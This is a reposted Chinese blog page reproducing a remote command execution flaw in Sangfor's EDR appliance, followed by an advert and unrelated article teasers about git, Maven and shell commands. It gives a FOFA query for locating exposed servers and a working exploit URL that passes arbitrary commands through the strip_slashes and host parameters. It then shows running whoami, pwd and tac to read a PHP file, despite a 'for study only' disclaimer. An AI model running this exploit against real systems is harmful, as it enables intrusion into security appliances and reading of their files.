深信服EDR远程命令执行复现

摘要:
strip_Slashes=system&host=id修改id值以执行命令。使用whoami查询当前用户权限。使用pwd查询当前目录。查看当前目录中的文件或目录。查看l.php文件的内容。cat命令无法查看l.php文件的内容。因此使用了tac命令。
  • 先用fofa找到一个有漏洞的链接
body="终端检测响应平台"

深信服EDR远程命令执行复现第1张

  • 漏洞利用
https://xxx.xxx.xx.xx/tool/log/c.php?strip_slashes=system&host=id

修改id值为执行的命令

  • 使用whoami查询当前用户权限

深信服EDR远程命令执行复现第2张

  • 使用pwd查询当前所在目录

 深信服EDR远程命令执行复现第3张

  • 查看当前目录有哪些文件或目录

 深信服EDR远程命令执行复现第4张

  • 查看l.php文件内容

                cat命令查看不了,所以使用了tac命令。

 深信服EDR远程命令执行复现第5张

免责声明:文章转载自《深信服EDR远程命令执行复现》仅用于学习参考。如对内容有疑问,请及时联系本站处理。

上篇减少Qt编译时间暨简单Qt裁剪类的加载过程(类的生命周期)详解下篇

宿迁高防,2C2G15M,22元/月;香港BGP,2C5G5M,25元/月 雨云优惠码:MjYwNzM=

相关文章

progit 之 git 起步(1)

了解git为什么这么流行,为什么应该使用git 以及 如何设置及使用git 关于版本控制 版本控制是一种记录一个或若干文件内容变化,以便将来查阅特定版本修订情况的系统。有了它就可以将文件回溯到之前的状态,甚至将整个项目都回溯到过去某个时间点的状态。 本地版本控制系统 许多人习惯用复制的方式来保存不同的版本,或许还会改名加上备份时间以示区别。这么做的唯一好处...

运维与自动化系列④自动化部署基础与git

运维与自动化系列④自动化部署基础与git 自动化部署基础与git 一:上一篇的代码是保存在本地,但是在生产环境当中是由版本控制进行代码管理,以便于发布代码和回滚,一般是使用gitlib比较多,另外还有用svn的公司,趋势是git为主,因此本文以git为使用对象 1.1:在git服务器新建一个web组和项目web-demo: 准备web页面并提交至git服务...

【转】Maven pom.xml 配置详解

  原文链接:https://yq.aliyun.com/articles/38271   pom.xml文件配置详解 --声明规范 <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xsi:s...

Linux目录及常用命令

Linux目录1. bin.用于存放可执行的二进制文件(ll,mkdir)2. boot 存放用于系统引导时使用的各种文件3. dev 用于存放设备文件 如打印机4. etc.存放系统配置文件 如MySQL的配置文件5. home. 存放所有用户的根目录 user6. lib 存放跟文件系统汇总的程序运行所需要的共享库及内核模块 依赖如Spring Spr...

Git系列(1) Windows下Git服务器搭建

  作为对前两天Git服务器搭建的一个整理,我想分别从服务端和客户端两个角度来记录下整个搭建过程,为了达到目标,我们需要哪些操作。 (一)服务端软件和账号的安装配置   我们这里只需要两个软件git和ssh,软件版本如下,这两个版本的安装也是非常简单,基本只要注意一点即可:安装目录最好不要用默认路径,确保安装路径中没有空格。其他步骤基本一路Next即可。 ...

mac终端常用命令

mac 终端 常用命令 基本命令1、列出文件ls 参数 目录名        例: 看看驱动目录下有什么:ls /System/Library/Extensions参数 -w 显示中文,-l 详细信息, -a 包括隐藏文件2、转换目录      cd    例:想到驱动目录下溜达一圈   cd /System/Library/Extensions 3...